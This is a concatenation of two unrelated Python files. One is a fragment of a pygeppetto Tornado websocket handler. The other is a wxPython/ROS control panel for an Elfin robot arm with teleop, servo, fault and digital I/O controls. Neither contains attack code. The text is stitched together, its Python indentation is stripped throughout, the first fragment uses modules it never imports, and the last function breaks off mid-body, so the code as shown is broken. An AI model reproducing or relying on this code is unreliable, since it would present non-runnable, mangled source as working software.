from pygeppetto.api.inbound_messages import InboundMessages
from pygeppetto.api.message_handler import GeppettoMessageHandler
from pygeppetto.managers import GeppettoManager
from tornado.websocket import WebSocketHandler
MANAGERS_HANGING_TIME_SECONDS = 60 * 5
class TornadoGeppettoWebSocketHandler(WebSocketHandler, GeppettoMessageHandler):
hanging_managers = {}
def open(self):
# 1 -> Send the connection
logging.info('Open websocket')
self.sendClientId()
# 2 -> Check user privileges
self.sendPrivileges()
def send_message_data(self, msg_data):
msg = json.dumps(msg_data)
if settings.websocket.compression_enabled and len(msg) > settings.websocket.min_message_length_for_compression:
self.write_message(gzip.compress(bytes(msg, 'utf-8')), binary=True)
else:
self.write_message(msg)
def handle_message(self, payload):
msg_type = self.get_message_type(payload)
if msg_type == InboundMessages.RECONNECT:
connection_id = json.loads(payload['data'])['connectionID']
self.recover_manager(connection_id)
super().handle_message(payload)
def on_message(self, message):
self.handle_message(json.loads(message))
def on_close(self):
self.cleanup_manager(self.scope_id)
logging.info("Closed Connection ...")
def convertRunnableQueriesDataTransferModel(self, runnableQueries):
""" generated source for method convertRunnableQueriesDataTransferModel """
runnableQueriesEMF = EList('')
from pygeppetto.model.datasources.datasources import RunnableQuery
for dt in runnableQueries:
rqEMF = RunnableQuery(targetVariablePath=dt.targetVariablePath, queryPath=dt.queryPath)
runnableQueriesEMF.append(rqEMF)
return runnableQueriesEMF
def recover_manager(self, connection_id):
if GeppettoManager.has_instance(connection_id):
self.geppettoManager = GeppettoManager.replace_instance(connection_id, self.scope_id)
@classmethod
def cleanup_manager(cls, client_id):
from threading import Thread
def clean_up():
time.sleep(MANAGERS_HANGING_TIME_SECONDS)
GeppettoManager.cleanup_instance(client_id)
Thread(target=clean_up).start()
|
elfin_gui.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 28 12:18:05 2017
@author: Cong Liu
Software License Agreement (BSD License)
Copyright (c) 2017, Han's Robot Co., Ltd.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the copyright holders nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
# author: Cong Liu
from __future__ import division
import rospy
import math
import os # 20201209: add os path
import tf
import moveit_commander
from std_msgs.msg import Bool, String
from std_srvs.srv import SetBool, SetBoolRequest, SetBoolResponse
from elfin_robot_msgs.srv import SetString, SetStringRequest, SetStringResponse
from elfin_robot_msgs.srv import SetInt16, SetInt16Request
from elfin_robot_msgs.srv import *
import wx
from sensor_msgs.msg import JointState
from actionlib import SimpleActionClient
from control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal
import threading
import dynamic_reconfigure.client
class MyFrame(wx.Frame):
def __init__(self,parent,id):
the_size=(700, 720) # height from 550 change to 700
wx.Frame.__init__(self,parent,id,'Elfin Control Panel',pos=(250,100))
self.panel=wx.Panel(self)
font=self.panel.GetFont()
font.SetPixelSize((12, 24))
self.panel.SetFont(font)
self.listener = tf.TransformListener()
self.robot=moveit_commander.RobotCommander()
self.scene=moveit_commander.PlanningSceneInterface()
self.group=moveit_commander.MoveGroupCommander('elfin_arm')
self.controller_ns='elfin_arm_controller/'
self.elfin_driver_ns='elfin_ros_control/elfin/'
self.elfin_IO_ns='elfin_ros_control/elfin/io_port1/' # 20201126: add IO ns
self.call_read_do_req = ElfinIODReadRequest()
self.call_read_di_req = ElfinIODReadRequest()
self.call_read_do_req.data = True
self.call_read_di_req.data = True
self.call_read_do = rospy.ServiceProxy(self.elfin_IO_ns+'read_do',ElfinIODRead)
self.call_read_di = rospy.ServiceProxy(self.elfin_IO_ns+'read_di',ElfinIODRead)
# 20201126: add service for write_do
self.call_write_DO=rospy.ServiceProxy(self.elfin_IO_ns+'write_do',ElfinIODWrite)
self.elfin_basic_api_ns='elfin_basic_api/'
self.joint_names=rospy.get_param(self.controller_ns+'joints', [])
self.ref_link_name=self.group.get_planning_frame()
self.end_link_name=self.group.get_end_effector_link()
self.ref_link_lock=threading.Lock()
self.end_link_lock=threading.Lock()
self.DO_btn_lock = threading.Lock() # 20201208: add the threading lock
self.DI_show_lock = threading.Lock()
self.js_display=[0]*6 # joint_states
self.jm_button=[0]*6 # joints_minus
self.jp_button=[0]*6 # joints_plus
self.js_label=[0]*6 # joint_states
self.ps_display=[0]*6 # pcs_states
self.pm_button=[0]*6 # pcs_minus
self.pp_button=[0]*6 # pcs_plus
self.ps_label=[0]*6 # pcs_states
# 20201208: add the button array
self.DO_btn_display=[0]*4 # DO states
self.DI_display=[0]*4 # DI states
self.LED_display=[0]*4 # LED states
self.End_btn_display=[0]*4 # end button states
self.btn_height=370 # 20201126: from 390 change to 370
self.btn_path = os.path.dirname(os.path.realpath(__file__)) # 20201209: get the elfin_gui.py path
btn_lengths=[]
self.DO_DI_btn_length=[0,92,157,133] # 20201209: the length come from servo on, servo off, home, stop button
self.btn_interstice=22 # 20201209: come from btn_interstice
self.display_init()
self.key=[]
self.DO_btn=[0,0,0,0,0,0,0,0] # DO state, first four bits is DO, the other is LED
self.DI_show=[0,0,0,0,0,0,0,0] # DI state, first four bits is DI, the other is the end button
self.power_on_btn=wx.Button(self.panel, label=' Servo On ', name='Servo On',
pos=(20, self.btn_height))
btn_lengths.append(self.power_on_btn.GetSize()[0])
btn_total_length=btn_lengths[0]
self.power_off_btn=wx.Button(self.panel, label=' Servo Off ', name='Servo Off')
btn_lengths.append(self.power_off_btn.GetSize()[0])
btn_total_length+=btn_lengths[1]
self.reset_btn=wx.Button(self.panel, label=' Clear Fault ', name='Clear Fault')
btn_lengths.append(self.reset_btn.GetSize()[0])
btn_total_length+=btn_lengths[2]
self.home_btn=wx.Button(self.panel, label='Home', name='home_btn')
btn_lengths.append(self.home_btn.GetSize()[0])
btn_total_length+=btn_lengths[3]
self.stop_btn=wx.Button(self.panel, label='Stop', name='Stop')
btn_lengths.append(self.stop_btn.GetSize()[0])
btn_total_length+=btn_lengths[4]
self.btn_interstice=(550-btn_total_length)/4
btn_pos_tmp=btn_lengths[0]+self.btn_interstice+20 # 20201126: 20:init length + btn0 length + btn_inter:gap
self.power_off_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[1]+self.btn_interstice
self.reset_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[2]+self.btn_interstice
self.home_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[3]+self.btn_interstice
self.stop_btn.SetPosition((btn_pos_tmp, self.btn_height))
self.servo_state_label=wx.StaticText(self.panel, label='Servo state:',
pos=(590, self.btn_height-10))
self.servo_state_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', pos=(600, self.btn_height+10))
self.servo_state=bool()
self.servo_state_lock=threading.Lock()
self.fault_state_label=wx.StaticText(self.panel, label='Fault state:',
pos=(590, self.btn_height+60))
self.fault_state_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', pos=(600, self.btn_height+80))
self.fault_state=bool()
self.fault_state_lock=threading.Lock()
# 20201209: add the description of end button
self.end_button_state_label=wx.StaticText(self.panel, label='END Button\n state',
pos=(555,self.btn_height+160))
self.reply_show_label=wx.StaticText(self.panel, label='Result:',
pos=(20, self.btn_height+260)) # 20201126: btn_height from 120 change to 260.
self.reply_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', size=(670, 30), pos=(20, self.btn_height+280))# 20201126: btn_height from 140 change to 280.
link_textctrl_length=(btn_pos_tmp-40)/2
self.ref_links_show_label=wx.StaticText(self.panel, label='Ref. link:',
pos=(20, self.btn_height+210)) # 20201126: btn_height from 60 change to 210.
self.ref_link_show=wx.TextCtrl(self.panel, style=(wx.TE_READONLY),
value=self.ref_link_name, size=(link_textctrl_length, 30),
pos=(20, self.btn_height+230)) # 20201126: btn_height from 80 change to 230.
self.end_link_show_label=wx.StaticText(self.panel, label='End link:',
pos=(link_textctrl_length+30, self.btn_height+210))# 20201126: btn_height from 80 change to 200.
self.end_link_show=wx.TextCtrl(self.panel, style=(wx.TE_READONLY),
value=self.end_link_name, size=(link_textctrl_length, 30),
pos=(link_textctrl_length+30, self.btn_height+230))
self.set_links_btn=wx.Button(self.panel, label='Set links', name='Set links')
self.set_links_btn.SetPosition((btn_pos_tmp, self.btn_height+230)) # 20201126: btn_height from 75 change to 220.
# the variables about velocity scaling
velocity_scaling_init=rospy.get_param(self.elfin_basic_api_ns+'velocity_scaling',
default=0.1)
default_velocity_scaling=str(round(velocity_scaling_init, 2))
self.velocity_setting_label=wx.StaticText(self.panel, label='Velocity Scaling',
pos=(20, self.btn_height-55)) # 20201126: btn_height from 70 change to 55
self.velocity_setting=wx.Slider(self.panel, value=int(velocity_scaling_init*100),
minValue=1, maxValue=100,
style = wx.SL_HORIZONTAL,
size=(500, 30),
pos=(45, self.btn_height-35)) # 20201126: btn_height from 70 change to 35
self.velocity_setting_txt_lower=wx.StaticText(self.panel, label='1%',
pos=(20, self.btn_height-35)) # 20201126: btn_height from 45 change to 35
self.velocity_setting_txt_upper=wx.StaticText(self.panel, label='100%',
pos=(550, self.btn_height-35))# 20201126: btn_height from 45 change to 35
self.velocity_setting_show=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER|wx.TE_READONLY),
value=default_velocity_scaling,
pos=(600, self.btn_height-45))# 20201126: btn_height from 55 change to 45
self.velocity_setting.Bind(wx.EVT_SLIDER, self.velocity_setting_cb)
self.teleop_api_dynamic_reconfig_client=dynamic_reconfigure.client.Client(self.elfin_basic_api_ns,
config_callback=self.basic_api_reconfigure_cb)
self.dlg=wx.Dialog(self.panel, title='messag')
self.dlg.Bind(wx.EVT_CLOSE, self.closewindow)
self.dlg_panel=wx.Panel(self.dlg)
self.dlg_label=wx.StaticText(self.dlg_panel, label='hello', pos=(15, 15))
self.set_links_dlg=wx.Dialog(self.panel, title='Set links', size=(400, 100))
self.set_links_dlg_panel=wx.Panel(self.set_links_dlg)
self.sld_ref_link_show=wx.TextCtrl(self.set_links_dlg_panel, style=wx.TE_PROCESS_ENTER,
value='', pos=(20, 20), size=(link_textctrl_length, 30))
self.sld_end_link_show=wx.TextCtrl(self.set_links_dlg_panel, style=wx.TE_PROCESS_ENTER,
value='', pos=(20, 70), size=(link_textctrl_length, 30))
self.sld_set_ref_link_btn=wx.Button(self.set_links_dlg_panel, label='Update ref. link',
name='Update ref. link')
self.sld_set_ref_link_btn.SetPosition((link_textctrl_length+30, 15))
self.sld_set_end_link_btn=wx.Button(self.set_links_dlg_panel, label='Update end link',
name='Update end link')
self.sld_set_end_link_btn.SetPosition((link_textctrl_length+30, 65))
self.set_links_dlg.SetSize((link_textctrl_length+self.sld_set_ref_link_btn.GetSize()[0]+50, 120))
self.call_teleop_joint=rospy.ServiceProxy(self.elfin_basic_api_ns+'joint_teleop',
SetInt16)
self.call_teleop_joint_req=SetInt16Request()
self.call_teleop_cart=rospy.ServiceProxy(self.elfin_basic_api_ns+'cart_teleop',
SetInt16)
self.call_teleop_cart_req=SetInt16Request()
self.call_teleop_stop=rospy.ServiceProxy(self.elfin_basic_api_ns+'stop_teleop',
SetBool)
self.call_teleop_stop_req=SetBoolRequest()
self.call_stop=rospy.ServiceProxy(self.elfin_basic_api_ns+'stop_teleop',
SetBool)
self.call_stop_req=SetBoolRequest()
self.call_stop_req.data=True
self.stop_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_stop,
rq=self.call_stop_req :
self.call_set_bool_common(evt, cl, rq))
self.call_reset=rospy.ServiceProxy(self.elfin_driver_ns+'clear_fault', SetBool)
self.call_reset_req=SetBoolRequest()
self.call_reset_req.data=True
self.reset_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_reset,
rq=self.call_reset_req :
self.call_set_bool_common(evt, cl, rq))
self.call_power_on=rospy.ServiceProxy(self.elfin_basic_api_ns+'enable_robot', SetBool)
self.call_power_on_req=SetBoolRequest()
self.call_power_on_req.data=True
self.power_on_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_power_on,
rq=self.call_power_on_req :
self.call_set_bool_common(evt, cl, rq))
self.call_power_off=rospy.ServiceProxy(self.elfin_basic_api_ns+'disable_robot', SetBool)
self.call_power_off_req=SetBoolRequest()
self.call_power_off_req.data=True
self.power_off_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_power_off,
rq=self.call_power_off_req :
self.call_set_bool_common(evt, cl, rq))
self.call_move_homing=rospy.ServiceProxy(self.elfin_basic_api_ns+'home_teleop',
SetBool)
self.call_move_homing_req=SetBoolRequest()
self.call_move_homing_req.data=True
self.home_btn.Bind(wx.EVT_LEFT_DOWN,
lambda evt, cl=self.call_move_homing,
rq=self.call_move_homing_req :
self.call_set_bool_common(evt, cl, rq))
self.home_btn.Bind(wx.EVT_LEFT_UP,
lambda evt, mark=100:
self.release_button(evt, mark) )
self.call_set_ref_link=rospy.ServiceProxy(self.elfin_basic_api_ns+'set_reference_link', SetString)
self.call_set_end_link=rospy.ServiceProxy(self.elfin_basic_api_ns+'set_end_link', SetString)
self.set_links_btn.Bind(wx.EVT_BUTTON, self.show_set_links_dialog)
self.sld_set_ref_link_btn.Bind(wx.EVT_BUTTON, self.update_ref_link)
self.sld_set_end_link_btn.Bind(wx.EVT_BUTTON, self.update_end_link)
self.sld_ref_link_show.Bind(wx.EVT_TEXT_ENTER, self.update_ref_link)
self.sld_end_link_show.Bind(wx.EVT_TEXT_ENTER, self.update_end_link)
self.action_client=SimpleActionClient(self.controller_ns+'follow_joint_trajectory',
FollowJointTrajectoryAction)
self.action_goal=FollowJointTrajectoryGoal()
self.action_goal.trajectory.joint_names=self.joint_names
self.SetMinSize(the_size)
self.SetMaxSize(the_size)
def display_init(self):
js_pos=[20, 20]
js_btn_length=[70, 70, 61, 80]
js_distances=[10, 20, 10, 26]
dis_h=50
for i in xrange(len(self.js_display)):
self.jp_button[i]=wx.Button(self.panel,
label='J'+str(i+1)+' +',
pos=(js_pos[0],
js_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp=js_btn_length[0]+js_distances[0]
self.jp_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=i+1 : self.teleop_joints(evt, mark) )
self.jp_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=i+1 : self.release_button(evt, mark) )
self.jm_button[i]=wx.Button(self.panel,
label='J'+str(i+1)+' -',
pos=(js_pos[0]+dis_tmp,
js_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp+=js_btn_length[1]+js_distances[1]
self.jm_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=-1*(i+1) : self.teleop_joints(evt, mark) )
self.jm_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=-1*(i+1) : self.release_button(evt, mark) )
pos_js_label=(js_pos[0]+dis_tmp, js_pos[1]+(5-i)*dis_h)
self.js_label[i]=wx.StaticText(self.panel,
label='J'+str(i+1)+'/deg:',
pos=pos_js_label)
self.js_label[i].SetPosition((pos_js_label[0], pos_js_label[1]+abs(40-self.js_label[i].GetSize()[1])/2))
dis_tmp+=js_btn_length[2]+js_distances[2]
pos_js_display=(js_pos[0]+dis_tmp, js_pos[1]+(5-i)*dis_h)
self.js_display[i]=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER |wx.TE_READONLY),
value=' 0000.00 ',
pos=pos_js_display)
self.js_display[i].SetPosition((pos_js_display[0], pos_js_display[1]+abs(40-self.js_display[i].GetSize()[1])/2))
dis_tmp+=js_btn_length[3]+js_distances[3]
ps_pos=[js_pos[0]+dis_tmp, 20]
ps_btn_length=[70, 70, 53, 80]
ps_distances=[10, 20, 10, 20]
pcs_btn_label=['X', 'Y', 'Z', 'Rx', 'Ry', 'Rz']
pcs_label=['X', 'Y', 'Z', 'R', 'P', 'Y']
unit_label=['/mm:', '/mm:', '/mm:', '/deg:', '/deg:', '/deg:']
for i in xrange(len(self.ps_display)):
self.pp_button[i]=wx.Button(self.panel,
label=pcs_btn_label[i]+' +',
pos=(ps_pos[0],
ps_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp=ps_btn_length[0]+ps_distances[0]
self.pp_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=i+1 : self.teleop_pcs(evt, mark) )
self.pp_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=i+1 : self.release_button(evt, mark) )
self.pm_button[i]=wx.Button(self.panel,
label=pcs_btn_label[i]+' -',
pos=(ps_pos[0]+dis_tmp,
ps_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp+=ps_btn_length[1]+ps_distances[1]
self.pm_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=-1*(i+1) : self.teleop_pcs(evt, mark) )
self.pm_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=-1*(i+1) : self.release_button(evt, mark) )
pos_ps_label=(ps_pos[0]+dis_tmp, ps_pos[1]+(5-i)*dis_h)
self.ps_label[i]=wx.StaticText(self.panel,
label=pcs_label[i]+unit_label[i],
pos=pos_ps_label)
self.ps_label[i].SetPosition((pos_ps_label[0], pos_ps_label[1]+abs(40-self.ps_label[i].GetSize()[1])/2))
dis_tmp+=ps_btn_length[2]+ps_distances[2]
pos_ps_display=(ps_pos[0]+dis_tmp, ps_pos[1]+(5-i)*dis_h)
self.ps_display[i]=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER |wx.TE_READONLY),
value='',
pos=pos_ps_display)
self.ps_display[i].SetPosition((pos_ps_display[0], pos_ps_display[1]+abs(40-self.ps_display[i].GetSize()[1])/2))
dis_tmp+=ps_btn_length[3]+ps_distances[3]
# 20201209: add the DO,LED,DI,end button.
for i in xrange(len(self.DO_btn_display)):
self.DO_btn_display[i]=wx.Button(self.panel,label='DO'+str(i),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,
self.btn_height+40))
self.DO_btn_display[i].Bind(wx.EVT_BUTTON,
lambda evt,marker=i,cl=self.call_write_DO :
self.call_write_DO_command(evt,marker,cl))
self.DI_display[i]=wx.TextCtrl(self.panel, style=(wx.TE_CENTER | wx.TE_READONLY), value='DI'+str(i),
size=(self.DO_btn_display[i].GetSize()),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,self.btn_height+80))
self.LED_display[i]=wx.Button(self.panel,label='LED'+str(i),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,self.btn_height+120))
self.LED_display[i].Bind(wx.EVT_BUTTON,
lambda evt, marker=4+i, cl=self.call_write_DO :
self.call_write_DO_command(evt, marker,cl))
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i)+'_low.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap()
self.End_btn_display[i]=wx.StaticBitmap(self.panel,-1,png,
pos=(40+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,
self.btn_height+160))
def velocity_setting_cb(self, event):
current_velocity_scaling=self.velocity_setting.GetValue()*0.01
self.teleop_api_dynamic_reconfig_client.update_configuration({'velocity_scaling': current_velocity_scaling})
wx.CallAfter(self.update_velocity_scaling_show, current_velocity_scaling)
def basic_api_reconfigure_cb(self, config):
if self.velocity_setting_show.GetValue()!=config.velocity_scaling:
self.velocity_setting.SetValue(int(config.velocity_scaling*100))
wx.CallAfter(self.update_velocity_scaling_show, config.velocity_scaling)
def action_stop(self):
self.action_client.wait_for_server(timeout=rospy.Duration(secs=0.5))
self.action_goal.trajectory.header.stamp.secs=0
self.action_goal.trajectory.header.stamp.nsecs=0
self.action_goal.trajectory.points=[]
self.action_client.send_goal(self.action_goal)
def teleop_joints(self,event,mark):
self.call_teleop_joint_req.data=mark
resp=self.call_teleop_joint.call(self.call_teleop_joint_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def teleop_pcs(self,event,mark):
self.call_teleop_cart_req.data=mark
resp=self.call_teleop_cart.call(self.call_teleop_cart_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def release_button(self, event, mark):
self.call_teleop_stop_req.data=True
resp=self.call_teleop_stop.call(self.call_teleop_stop_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def call_set_bool_common(self, event, client, request):
btn=event.GetEventObject()
check_list=['Servo On', 'Servo Off', 'Clear Fault']
# Check servo state
if btn.GetName()=='Servo On':
servo_enabled=bool()
if self.servo_state_lock.acquire():
servo_enabled=self.servo_state
self.servo_state_lock.release()
if servo_enabled:
resp=SetBoolResponse()
resp.success=False
resp.message='Robot is already enabled'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
return
# Check fault state
if btn.GetName()=='Clear Fault':
fault_flag=bool()
if self.fault_state_lock.acquire():
fault_flag=self.fault_state
self.fault_state_lock.release()
if not fault_flag:
resp=SetBoolResponse()
resp.success=False
resp.message='There is no fault now'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
return
# Check if the button is in check list
if btn.GetName() in check_list:
self.show_message_dialog(btn.GetName(), client, request)
else:
try:
resp=client.call(request)
wx.CallAfter(self.update_reply_show, resp)
except rospy.ServiceException, e:
resp=SetBoolResponse()
resp.success=False
resp.message='no such service in simulation'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def thread_bg(self, msg, client, request):
wx.CallAfter(self.show_dialog)
if msg=='Servo Off':
self.action_stop()
rospy.sleep(1)
try:
resp=client.call(request)
wx.CallAfter(self.update_reply_show, resp)
except rospy.ServiceException, e:
resp=SetBoolResponse()
resp.success=False
resp.message='no such service in simulation'
wx.CallAfter(self.update_reply_show, resp)
wx.CallAfter(self.destroy_dialog)
# 20201201: add function for processing value to DO_btn
def process_DO_btn(self,value):
if self.DO_btn_lock.acquire():
for i in range(0,8):
tmp = (value >> (12 + i)) & 0x01
self.DO_btn[i]=tmp
self.DO_btn_lock.release()
# 20201201: add function to read DO.
def call_read_DO_command(self):
try:
client = self.call_read_do
val = client.call(self.call_read_do_req).digital_input
self.process_DO_btn(val)
except rospy.ServiceException, e:
resp=ElfinIODReadResponse()
resp.digital_input=0x0000
# 20201201: add function for processing value
def process_DI_btn(self,value):
if self.DI_show_lock.acquire():
if value > 0:
for i in range(0,8):
tmp = (value >> (16 + i)) & 0x01
self.DI_show[i]=tmp
else:
self.DI_show = [0,0,0,0,0,0,0,0]
self.DI_show_lock.release()
# 20201201: add function to read DI.
def call_read_DI_command(self):
try:
client = self.call_read_di
val = client.call(self.call_read_di_req).digital_input
self.process_DI_btn(val)
except rospy.ServiceException, e:
resp=ElfinIODReadResponse()
resp.digital_input=0x0000
# 20201202: add function to read DO and DI.
def monitor_DO_DI(self,evt):
self.call_read_DI_command()
self.call_read_DO_command()
# 20201126: add function to write DO.
def call_write_DO_command(self, event, marker, client):
self.justification_DO_btn(marker)
request = 0
try:
self.DO_btn_lock.acquire()
for i in range(0,8):
request = request + self.DO_btn[i]*pow(2,i)
resp=client.call(request << 12)
self.DO_btn_lock.release()
except rospy.ServiceException, e:
self.DO_btn_lock.release()
resp=ElfinIODWriteResponse()
resp.success=False
self.justification_DO_btn(marker)
rp=SetBoolResponse()
rp.success=False
rp.message='no such service for DO control'
wx.CallAfter(self.update_reply_show, rp)
# 20201127: add justification to DO_btn
def justification_DO_btn(self,marker):
self.DO_btn_lock.acquire()
if 0 == self.DO_btn[marker]:
self.DO_btn[marker] = 1
else:
self.DO_btn[marker] = 0
self.DO_btn_lock.release()
# 20201201: add function to set DO_btn colour
def set_DO_btn_colour(self):
self.DO_btn_lock.acquire()
for i in range(0,4):
if 0 == self.DO_btn[i]:
self.DO_btn_display[i].SetBackgroundColour(wx.NullColour)
else:
self.DO_btn_display[i].SetBackgroundColour(wx.Colour(200,225,200))
self.DO_btn_lock.release()
# 20201201: add function to set DI_show colour
def set_DI_show_colour(self):
self.DI_show_lock.acquire()
for i in range(0,4):
if 0 == self.DI_show[i]:
self.DI_display[i].SetBackgroundColour(wx.NullColour)
else:
self.DI_display[i].SetBackgroundColour(wx.Colour(200,225,200))
self.DI_show_lock.release()
# 20201207: add function to set LED colour
def set_LED_show_colour(self):
self.DO_btn_lock.acquire()
for i in range(4,8):
if 0 == self.DO_btn[i]:
self.LED_display[i-4].SetBackgroundColour(wx.NullColour)
else:
self.LED_display[i-4].SetBackgroundColour(wx.Colour(200,225,200))
self.DO_btn_lock.release()
# 20201207: add function to set End_btn colour
def set_End_btn_colour(self):
self.DI_show_lock.acquire()
for i in range(4,8):
if 0 == self.DI_show[i]:
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i-4)+'_low.png',wx.BITMAP_TYPE_PNG)
self.End_btn_display[i-4].SetBitmap(wx.BitmapFromImage(png))
else:
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i-4)+'_high.png',wx.BITMAP_TYPE_PNG)
self.End_btn_display[i-4].SetBitmap(wx.BitmapFromImage(png))
self.DI_show_lock.release()
def set_color(self, evt):
wx.CallAfter(self.set_DO_btn_colour)
wx.CallAfter(self.set_DI_show_colour)
wx.CallAfter(self.set_LED_show_colour)
wx.CallAfter(self.set_End_btn_colour)
def show_message_dialog(self, message, cl, rq):
msg='executing ['+message+']'
self.dlg_label.SetLabel(msg)
lable_size=[]
lable_size.append(self.dlg_label.GetSize()[0])
lable_size.append(self.dlg_label.GetSize()[1])
self.dlg.SetSize((lable_size[0]+30, lable_size[1]+30))
t=threading.Thread(target=self.thread_bg, args=(message, cl, rq,))
t.start()
def show_dialog(self):
self.dlg.SetPosition((self.GetPosition()[0]+250,
self.GetPosition()[1]+250))
self.dlg.ShowModal()
def destroy_dialog(self):
self.dlg.EndModal(0)
def closewindow(self,event):
pass
def show_set_links_dialog(self, evt):
self.sld_ref_link_show.SetValue(self.ref_link_name)
self.sld_end_link_show.SetValue(self.end_link_name)
self.set_links_dlg.SetPosition((self.GetPosition()[0]+150,
self.GetPosition()[1]+250))
self.set_links_dlg.ShowModal()
def update_ref_link(self, evt):
request=SetStringRequest()
request.data=self.sld_ref_link_show.GetValue()
resp=self.call_set_ref_link.call(request)
wx.CallAfter(self.update_reply_show, resp)
def update_end_link(self, evt):
request=SetStringRequest()
request.data=self.sld_end_link_show.GetValue()
resp=self.call_set_end_link.call(request)
wx.CallAfter(self.update_reply_show, resp)
def updateDisplay(self, msg):
for i in xrange(len(self.js_display)):
self.js_display[i].SetValue(msg[i])
for i in xrange(len(self.ps_display)):
self.ps_display[i].SetValue(msg[i+6])
if self.ref_link_lock.acquire():
ref_link=self.ref_link_name
self.ref_link_lock.release()
if self.end_link_lock.acquire():
end_link=self.end_link_name
self.end_link_lock.release()
self.ref_link_show.SetValue(ref_link)
self.end_link_show.SetValue(end_link)
def update_reply_show(self,msg):
if msg.success:
self.reply_show.SetBackgroundColour(wx.Colour(200, 225, 200))
else:
self.reply_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.reply_show.SetValue(msg.message)
def update_servo_state(self, msg):
if msg.data:
self.servo_state_show.SetBackgroundColour(wx.Colour(200, 225, 200))
self.servo_state_show.SetValue('Enabled')
else:
self.servo_state_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.servo_state_show.SetValue('Disabled')
def update_fault_state(self, msg):
if msg.data:
self.fault_state_show.SetBackgroundColour(wx.Colour(225, 200, 200))
self.fault_state_show.SetValue('Warning')
else:
self.fault_state_show.SetBackgroundColour(wx.Colour(200, 225, 200))
self.fault_state_show.SetValue('No Fault')
def update_velocity_scaling_show(self, msg):
self.velocity_setting_show.SetValue(str(round(msg, 2)*100)+'%') # 20201127: change the show format
def js_call_back(self, data):
while not rospy.is_shutdown():
try:
self.listener.waitForTransform(self.group.get_planning_frame(),
self.group.get_end_effector_link(),
rospy.Time(0), rospy.Duration(100))
(xyz,qua) = self.listener.lookupTransform(self.group.get_planning_frame(),
self.group.get_end_effector_link(),
rospy.Time(0))
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
rpy=tf.transformations.euler_from_quaternion(qua)
for i in xrange(len(data.position)):
self.key.append(str(round(data.position[i]*180/math.pi, 2)))
self.key.append(str(round(xyz[0]*1000, 2)))
self.key.append(str(round(xyz[1]*1000, 2)))
self.key.append(str(round(xyz[2]*1000, 2)))
self.key.append(str(round(rpy[0]*180/math.pi, 2)))
self.key.append(str(round(rpy[1]*180/math.pi, 2)))
self.key.append(str(round(rpy[2]*180/math.pi, 2)))
